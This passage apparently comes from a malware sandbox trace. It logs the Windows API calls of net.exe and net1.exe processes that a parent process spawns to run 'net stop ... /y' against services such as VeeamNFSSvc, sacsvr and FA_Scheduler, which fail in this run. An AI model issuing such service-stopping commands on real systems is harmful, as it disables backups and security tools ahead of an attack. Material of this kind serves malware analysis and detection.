(_String1="workstation", _String2="sacsvr") returned 4 [0041.369] _wcsicmp (_String1="work", _String2="sacsvr") returned 4 [0041.369] _wcsicmp (_String1="wksta", _String2="sacsvr") returned 4 [0041.369] _wcsicmp (_String1="prdr", _String2="sacsvr") returned -3 [0041.369] _wcsicmp (_String1="devrdr", _String2="sacsvr") returned -15 [0041.369] _wcsicmp (_String1="lanmanworkstation", _String2="sacsvr") returned -7 [0041.369] _wcsicmp (_String1="server", _String2="sacsvr") returned 4 [0041.369] _wcsicmp (_String1="svr", _String2="sacsvr") returned 21 [0041.369] _wcsicmp (_String1="srv", _String2="sacsvr") returned 17 [0041.369] _wcsicmp (_String1="lanmanserver", _String2="sacsvr") returned -7 [0041.369] _wcsicmp (_String1="alerter", _String2="sacsvr") returned -18 [0041.369] _wcsicmp (_String1="netlogon", _String2="sacsvr") returned -5 [0041.369] _wcsupr (in: _String="sacsvr" | out: _String="SACSVR") returned="SACSVR" [0041.369] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4054b0 [0041.372] GetServiceKeyNameW (in: hSCManager=0x4054b0, lpDisplayName="SACSVR", lpServiceName=0x92aaf0, lpcchBuffer=0xef8fc | out: lpServiceName="", lpcchBuffer=0xef8fc) returned 0 [0041.373] _wcsicmp (_String1="msg", _String2="SACSVR") returned -6 [0041.373] _wcsicmp (_String1="messenger", _String2="SACSVR") returned -6 [0041.373] _wcsicmp (_String1="receiver", _String2="SACSVR") returned -1 [0041.373] _wcsicmp (_String1="rcv", _String2="SACSVR") returned -1 [0041.373] _wcsicmp (_String1="redirector", _String2="SACSVR") returned -1 [0041.373] _wcsicmp (_String1="redir", _String2="SACSVR") returned -1 [0041.373] _wcsicmp (_String1="rdr", _String2="SACSVR") returned -1 [0041.373] _wcsicmp (_String1="workstation", _String2="SACSVR") returned 4 [0041.373] _wcsicmp (_String1="work", _String2="SACSVR") returned 4 [0041.373] _wcsicmp (_String1="wksta", _String2="SACSVR") returned 4 [0041.373] _wcsicmp (_String1="prdr", _String2="SACSVR") returned -3 [0041.373] _wcsicmp (_String1="devrdr", _String2="SACSVR") returned -15 [0041.373] _wcsicmp (_String1="lanmanworkstation", _String2="SACSVR") returned -7 [0041.373] _wcsicmp (_String1="server", _String2="SACSVR") returned 4 [0041.373] _wcsicmp (_String1="svr", _String2="SACSVR") returned 21 [0041.373] _wcsicmp (_String1="srv", _String2="SACSVR") returned 17 [0041.373] _wcsicmp (_String1="lanmanserver", _String2="SACSVR") returned -7 [0041.373] _wcsicmp (_String1="alerter", _String2="SACSVR") returned -18 [0041.373] _wcsicmp (_String1="netlogon", _String2="SACSVR") returned -5 [0041.373] NetServiceControl (in: servername=0x0, service="SACSVR", opcode=0x0, arg=0x0, bufptr=0xef8f8 | out: bufptr=0xef8f8) returned 0x889 [0041.374] wcscpy_s (in: _Destination=0x92a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0041.374] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0041.374] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x92b338, nSize=0x800, Arguments=0x929dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0041.376] GetFileType (hFile=0x26c) returned 0x3 [0041.376] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x403fe0 [0041.376] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x403fe0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0041.376] WriteFile (in: hFile=0x26c, lpBuffer=0x403fe0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xef838, lpOverlapped=0x0 | out: lpBuffer=0x403fe0*, lpNumberOfBytesWritten=0xef838*=0x1e, lpOverlapped=0x0) returned 1 [0041.376] LocalFree (hMem=0x403fe0) returned 0x0 [0041.376] GetFileType (hFile=0x26c) returned 0x3 [0041.376] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x406288 [0041.376] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x406288, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n@", lpUsedDefaultChar=0x0) returned 2 [0041.376] WriteFile (in: hFile=0x26c, lpBuffer=0x406288*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef838, lpOverlapped=0x0 | out: lpBuffer=0x406288*, lpNumberOfBytesWritten=0xef838*=0x2, lpOverlapped=0x0) returned 1 [0041.376] LocalFree (hMem=0x406288) returned 0x0 [0041.376] _ultow (in: _Dest=0x889, _Radix=981096 | out: _Dest=0x889) returned="2185" [0041.376] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x92b338, nSize=0x800, Arguments=0x929dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0041.376] GetFileType (hFile=0x26c) returned 0x3 [0041.376] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x406288 [0041.376] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x406288, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0041.376] WriteFile (in: hFile=0x26c, lpBuffer=0x406288*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xef844, lpOverlapped=0x0 | out: lpBuffer=0x406288*, lpNumberOfBytesWritten=0xef844*=0x34, lpOverlapped=0x0) returned 1 [0041.376] LocalFree (hMem=0x406288) returned 0x0 [0041.376] GetFileType (hFile=0x26c) returned 0x3 [0041.376] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x406288 [0041.376] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x406288, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n@", lpUsedDefaultChar=0x0) returned 2 [0041.377] WriteFile (in: hFile=0x26c, lpBuffer=0x406288*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef844, lpOverlapped=0x0 | out: lpBuffer=0x406288*, lpNumberOfBytesWritten=0xef844*=0x2, lpOverlapped=0x0) returned 1 [0041.377] LocalFree (hMem=0x406288) returned 0x0 [0041.377] NetApiBufferFree (Buffer=0x401c60) returned 0x0 [0041.377] NetApiBufferFree (Buffer=0x401c78) returned 0x0 [0041.377] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sacsvr /y" [0041.377] exit (_Code=2) Process: id = "59" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47369000" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamNFSSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 127 os_tid = 0x62c Process: id = "60" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x48a14000" os_pid = "0x5a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xc4" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 128 os_tid = 0x780 [0041.652] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fa00 | out: lpSystemTimeAsFileTime=0x30fa00*(dwLowDateTime=0xe306d5e0, dwHighDateTime=0x1d57a86)) [0041.652] GetCurrentProcessId () returned 0x5a4 [0041.652] GetCurrentThreadId () returned 0x780 [0041.652] GetTickCount () returned 0x114566a [0041.652] QueryPerformanceCounter (in: lpPerformanceCount=0x30f9f8 | out: lpPerformanceCount=0x30f9f8*=16193652219) returned 1 [0041.652] GetModuleHandleA (lpModuleName=0x0) returned 0x670000 [0041.652] __set_app_type (_Type=0x1) [0041.652] __p__fmode () returned 0x74eb31f4 [0041.652] __p__commode () returned 0x74eb31fc [0041.652] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x67ffe6) returned 0x0 [0041.652] __getmainargs (in: _Argc=0x689064, _Argv=0x68906c, _Env=0x689068, _DoWildCard=0, _StartInfo=0x689024 | out: _Argc=0x689064, _Argv=0x68906c, _Env=0x689068) returned 0 [0041.653] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0041.653] GetConsoleOutputCP () returned 0x1b5 [0041.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x689080 | out: lpCPInfo=0x689080) returned 1 [0041.653] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.656] sprintf_s (in: _DstBuf=0x30f9b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0041.656] setlocale (category=0, locale=".437") returned="English_United States.437" [0041.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0041.658] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0041.658] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" [0041.658] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f784, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0041.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x6a) returned 0x433c10 [0041.658] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0041.658] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f988 | out: Buffer=0x30f988*=0x431c70) returned 0x0 [0041.658] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f988 | out: Buffer=0x30f988*=0x431c88) returned 0x0 [0041.658] _fileno (_File=0x74eb2900) returned -2 [0041.659] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0041.659] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0041.659] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0041.659] _wcsicmp (_String1="config", _String2="stop") returned -16 [0041.659] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0041.659] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0041.659] _wcsicmp (_String1="file", _String2="stop") returned -13 [0041.659] _wcsicmp (_String1="files", _String2="stop") returned -13 [0041.659] _wcsicmp (_String1="group", _String2="stop") returned -12 [0041.659] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0041.659] _wcsicmp (_String1="help", _String2="stop") returned -11 [0041.659] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0041.659] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0041.659] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0041.659] _wcsicmp (_String1="session", _String2="stop") returned -15 [0041.659] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0041.659] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0041.659] _wcsicmp (_String1="share", _String2="stop") returned -12 [0041.659] _wcsicmp (_String1="start", _String2="stop") returned -14 [0041.659] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0041.659] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0041.659] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0041.659] _wcsicmp (_String1="accounts", _String2="VeeamNFSSvc") returned -21 [0041.659] _wcsicmp (_String1="computer", _String2="VeeamNFSSvc") returned -19 [0041.659] _wcsicmp (_String1="config", _String2="VeeamNFSSvc") returned -19 [0041.659] _wcsicmp (_String1="continue", _String2="VeeamNFSSvc") returned -19 [0041.659] _wcsicmp (_String1="cont", _String2="VeeamNFSSvc") returned -19 [0041.659] _wcsicmp (_String1="file", _String2="VeeamNFSSvc") returned -16 [0041.659] _wcsicmp (_String1="files", _String2="VeeamNFSSvc") returned -16 [0041.659] _wcsicmp (_String1="group", _String2="VeeamNFSSvc") returned -15 [0041.659] _wcsicmp (_String1="groups", _String2="VeeamNFSSvc") returned -15 [0041.659] _wcsicmp (_String1="help", _String2="VeeamNFSSvc") returned -14 [0041.660] _wcsicmp (_String1="helpmsg", _String2="VeeamNFSSvc") returned -14 [0041.660] _wcsicmp (_String1="localgroup", _String2="VeeamNFSSvc") returned -10 [0041.660] _wcsicmp (_String1="pause", _String2="VeeamNFSSvc") returned -6 [0041.660] _wcsicmp (_String1="session", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="sessions", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="sess", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="share", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="start", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="stats", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="statistics", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="stop", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="time", _String2="VeeamNFSSvc") returned -2 [0041.660] _wcsicmp (_String1="user", _String2="VeeamNFSSvc") returned -1 [0041.660] _wcsicmp (_String1="users", _String2="VeeamNFSSvc") returned -1 [0041.660] _wcsicmp (_String1="msg", _String2="VeeamNFSSvc") returned -9 [0041.660] _wcsicmp (_String1="messenger", _String2="VeeamNFSSvc") returned -9 [0041.660] _wcsicmp (_String1="receiver", _String2="VeeamNFSSvc") returned -4 [0041.660] _wcsicmp (_String1="rcv", _String2="VeeamNFSSvc") returned -4 [0041.660] _wcsicmp (_String1="netpopup", _String2="VeeamNFSSvc") returned -8 [0041.660] _wcsicmp (_String1="redirector", _String2="VeeamNFSSvc") returned -4 [0041.660] _wcsicmp (_String1="redir", _String2="VeeamNFSSvc") returned -4 [0041.660] _wcsicmp (_String1="rdr", _String2="VeeamNFSSvc") returned -4 [0041.660] _wcsicmp (_String1="workstation", _String2="VeeamNFSSvc") returned 1 [0041.660] _wcsicmp (_String1="work", _String2="VeeamNFSSvc") returned 1 [0041.660] _wcsicmp (_String1="wksta", _String2="VeeamNFSSvc") returned 1 [0041.660] _wcsicmp (_String1="prdr", _String2="VeeamNFSSvc") returned -6 [0041.660] _wcsicmp (_String1="devrdr", _String2="VeeamNFSSvc") returned -18 [0041.660] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamNFSSvc") returned -10 [0041.660] _wcsicmp (_String1="server", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="svr", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="srv", _String2="VeeamNFSSvc") returned -3 [0041.660] _wcsicmp (_String1="lanmanserver", _String2="VeeamNFSSvc") returned -10 [0041.660] _wcsicmp (_String1="alerter", _String2="VeeamNFSSvc") returned -21 [0041.660] _wcsicmp (_String1="netlogon", _String2="VeeamNFSSvc") returned -8 [0041.661] _wcsupr (in: _String="VeeamNFSSvc" | out: _String="VEEAMNFSSVC") returned="VEEAMNFSSVC" [0041.661] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4354d0 [0041.663] GetServiceKeyNameW (in: hSCManager=0x4354d0, lpDisplayName="VEEAMNFSSVC", lpServiceName=0x68aaf0, lpcchBuffer=0x30f924 | out: lpServiceName="", lpcchBuffer=0x30f924) returned 0 [0041.664] _wcsicmp (_String1="msg", _String2="VEEAMNFSSVC") returned -9 [0041.664] _wcsicmp (_String1="messenger", _String2="VEEAMNFSSVC") returned -9 [0041.664] _wcsicmp (_String1="receiver", _String2="VEEAMNFSSVC") returned -4 [0041.664] _wcsicmp (_String1="rcv", _String2="VEEAMNFSSVC") returned -4 [0041.664] _wcsicmp (_String1="redirector", _String2="VEEAMNFSSVC") returned -4 [0041.664] _wcsicmp (_String1="redir", _String2="VEEAMNFSSVC") returned -4 [0041.664] _wcsicmp (_String1="rdr", _String2="VEEAMNFSSVC") returned -4 [0041.664] _wcsicmp (_String1="workstation", _String2="VEEAMNFSSVC") returned 1 [0041.664] _wcsicmp (_String1="work", _String2="VEEAMNFSSVC") returned 1 [0041.664] _wcsicmp (_String1="wksta", _String2="VEEAMNFSSVC") returned 1 [0041.664] _wcsicmp (_String1="prdr", _String2="VEEAMNFSSVC") returned -6 [0041.664] _wcsicmp (_String1="devrdr", _String2="VEEAMNFSSVC") returned -18 [0041.664] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMNFSSVC") returned -10 [0041.664] _wcsicmp (_String1="server", _String2="VEEAMNFSSVC") returned -3 [0041.664] _wcsicmp (_String1="svr", _String2="VEEAMNFSSVC") returned -3 [0041.664] _wcsicmp (_String1="srv", _String2="VEEAMNFSSVC") returned -3 [0041.664] _wcsicmp (_String1="lanmanserver", _String2="VEEAMNFSSVC") returned -10 [0041.664] _wcsicmp (_String1="alerter", _String2="VEEAMNFSSVC") returned -21 [0041.664] _wcsicmp (_String1="netlogon", _String2="VEEAMNFSSVC") returned -8 [0041.664] NetServiceControl (in: servername=0x0, service="VEEAMNFSSVC", opcode=0x0, arg=0x0, bufptr=0x30f920 | out: bufptr=0x30f920) returned 0x889 [0041.665] wcscpy_s (in: _Destination=0x68a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0041.665] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0041.666] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x68b338, nSize=0x800, Arguments=0x689dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0041.667] GetFileType (hFile=0x26c) returned 0x3 [0041.667] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x434000 [0041.667] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x434000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0041.667] WriteFile (in: hFile=0x26c, lpBuffer=0x434000*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30f860, lpOverlapped=0x0 | out: lpBuffer=0x434000*, lpNumberOfBytesWritten=0x30f860*=0x1e, lpOverlapped=0x0) returned 1 [0041.667] LocalFree (hMem=0x434000) returned 0x0 [0041.667] GetFileType (hFile=0x26c) returned 0x3 [0041.667] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4362a8 [0041.667] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4362a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0041.667] WriteFile (in: hFile=0x26c, lpBuffer=0x4362a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f860, lpOverlapped=0x0 | out: lpBuffer=0x4362a8*, lpNumberOfBytesWritten=0x30f860*=0x2, lpOverlapped=0x0) returned 1 [0041.667] LocalFree (hMem=0x4362a8) returned 0x0 [0041.667] _ultow (in: _Dest=0x889, _Radix=3209360 | out: _Dest=0x889) returned="2185" [0041.667] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x68b338, nSize=0x800, Arguments=0x689dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0041.667] GetFileType (hFile=0x26c) returned 0x3 [0041.667] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4362a8 [0041.667] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4362a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0041.667] WriteFile (in: hFile=0x26c, lpBuffer=0x4362a8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30f86c, lpOverlapped=0x0 | out: lpBuffer=0x4362a8*, lpNumberOfBytesWritten=0x30f86c*=0x34, lpOverlapped=0x0) returned 1 [0041.667] LocalFree (hMem=0x4362a8) returned 0x0 [0041.667] GetFileType (hFile=0x26c) returned 0x3 [0041.667] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4362a8 [0041.667] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4362a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0041.667] WriteFile (in: hFile=0x26c, lpBuffer=0x4362a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f86c, lpOverlapped=0x0 | out: lpBuffer=0x4362a8*, lpNumberOfBytesWritten=0x30f86c*=0x2, lpOverlapped=0x0) returned 1 [0041.667] LocalFree (hMem=0x4362a8) returned 0x0 [0041.668] NetApiBufferFree (Buffer=0x431c70) returned 0x0 [0041.668] NetApiBufferFree (Buffer=0x431c88) returned 0x0 [0041.668] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" [0041.668] exit (_Code=2) Process: id = "61" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4716e000" os_pid = "0x590" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop FA_Scheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 129 os_tid = 0x2ac Process: id = "62" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x47258000" os_pid = "0x204" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "61" os_parent_pid = "0x590" cmd_line = "C:\\Windows\\system32\\net1 stop FA_Scheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 130 os_tid = 0x1e8 [0041.992] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdf860 | out: lpSystemTimeAsFileTime=0xdf860*(dwLowDateTime=0xe33b3420, dwHighDateTime=0x1d57a86)) [0041.992] GetCurrentProcessId () returned 0x204 [0041.992] GetCurrentThreadId () returned 0x1e8 [0041.992] GetTickCount () returned 0x11457c1 [0041.992] QueryPerformanceCounter (in: lpPerformanceCount=0xdf858 | out: lpPerformanceCount=0xdf858*=16227638924) returned 1 [0041.992] GetModuleHandleA (lpModuleName=0x0) returned 0x3a0000 [0041.992] __set_app_type (_Type=0x1) [0041.992] __p__fmode () returned 0x74eb31f4 [0041.992] __p__commode () returned 0x74eb31fc [0041.992] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3affe6) returned 0x0 [0041.992] __getmainargs (in: _Argc=0x3b9064, _Argv=0x3b906c, _Env=0x3b9068, _DoWildCard=0, _StartInfo=0x3b9024 | out: _Argc=0x3b9064, _Argv=0x3b906c, _Env=0x3b9068) returned 0 [0041.992] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0041.992] GetConsoleOutputCP () returned 0x1b5 [0041.993] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3b9080 | out: lpCPInfo=0x3b9080) returned 1 [0041.993] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.996] sprintf_s (in: _DstBuf=0xdf818, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0041.996] setlocale (category=0, locale=".437") returned="English_United States.437" [0041.998] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0041.998] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0041.998] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop FA_Scheduler /y" [0041.998] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdf5e4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0041.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x6c) returned 0x223c10 [0041.998] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0041.998] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdf7e8 | out: Buffer=0xdf7e8*=0x221c70) returned 0x0 [0041.998] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdf7e8 | out: Buffer=0xdf7e8*=0x221c88) returned 0x0 [0041.998] _fileno (_File=0x74eb2900) returned -2 [0041.998] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0041.998] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0041.998] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0041.998] _wcsicmp (_String1="config", _String2="stop") returned -16 [0041.998] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0041.998] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0041.998] _wcsicmp (_String1="file", _String2="stop") returned -13 [0041.999] _wcsicmp (_String1="files", _String2="stop") returned -13 [0041.999] _wcsicmp (_String1="group", _String2="stop") returned -12 [0041.999] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0041.999] _wcsicmp (_String1="help", _String2="stop") returned -11 [0041.999] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0041.999] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0041.999] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0041.999] _wcsicmp (_String1="session", _String2="stop") returned -15 [0041.999] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0041.999] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0041.999] _wcsicmp (_String1="share", _String2="stop") returned -12 [0041.999] _wcsicmp (_String1="start", _String2="stop") returned -14 [0041.999] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0041.999] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0041.999] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0041.999] _wcsicmp (_String1="accounts", _String2="FA_Scheduler") returned -5 [0041.999] _wcsicmp (_String1="computer", _String2="FA_Scheduler") returned -3 [0041.999] _wcsicmp (_String1="config", _String2="FA_Scheduler") returned -3 [0041.999] _wcsicmp 